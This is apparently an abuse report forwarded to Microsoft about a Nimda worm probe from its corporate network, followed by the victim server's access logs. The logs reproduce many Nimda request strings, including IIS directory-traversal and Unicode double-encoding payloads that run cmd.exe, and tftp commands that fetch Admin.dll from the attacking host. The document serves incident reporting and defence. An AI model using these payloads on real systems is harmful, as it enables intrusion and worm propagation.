This mail was sent to Microsoft after detecting a NIMDA probe from a Microsoft IP. The IP is not MSN.com or a subsidiary, but Microsoft's corporate network.
- ---------- Forwarded message ---------- Date: 25 Dec 2001 03:34:36 -0000 To: a-rickst@microsoft.com (Admin) From: security@prettyplease.org (Early Bird) Cc: abuse@MICROSOFT.COM (Abuse) Subject: Nimda Worm intrusion attempt via your network (208.229.100.126) You are receiving this notice since your address is listed as the contact in the ARIN database for IP address 208.229.100.126. The following Nimda Worm intrusion attempt was made against PRETTYPLEASE.ORG. DATE/TIME: Dec-25-2001 (03:34:35) [UTC] SOURCE : 208.229.100.126:1784 DEST : 208.37.215.234 ATTEMPT : /scripts/root.exe?/c+dir Please advise your user that their system has been compromised and is being actively utilized as an attack launchpoint against other systems. Thank you for your prompt attention to this matter. - -Early Bird v2.6 (http://www.treachery.net/earlybird/) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: See http://www.treachery.net/~jdyson/ for current keys. iQCVAwUBPCq+PblDRyqRQ2a9AQE9KQP9FGoDiI5+Jrq1eDMj1wyqq4iih9zn4/qe HR1A4hZi9hlVPy3/eJq4Pi1XSR1Tkrm7wMY+8Ed+01KU88FJ40AxRe8H1L0qGiPM //FQSX0TUPyGYDzi/CKeDMZPaNm5PJq9hM3WQRKG6yhvLOoT5TUwOwVsJ/HCQutZ Wv5LMWv6XWw= =HM+r -----END PGP SIGNATURE-----
The admin of the site forwarded the relevant logs.
208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll HTTP/1.0" 200 361 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 419 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll HTTP/1.0" 200 359 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll HTTP/1.0" 200 355 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll HTTP/1.0" 200 355 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET /scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 497 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 497 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 497 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll HTTP/1.0" 200 420 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET /scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET /scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 395 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 452 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 452 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 452 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET /scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-" 208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"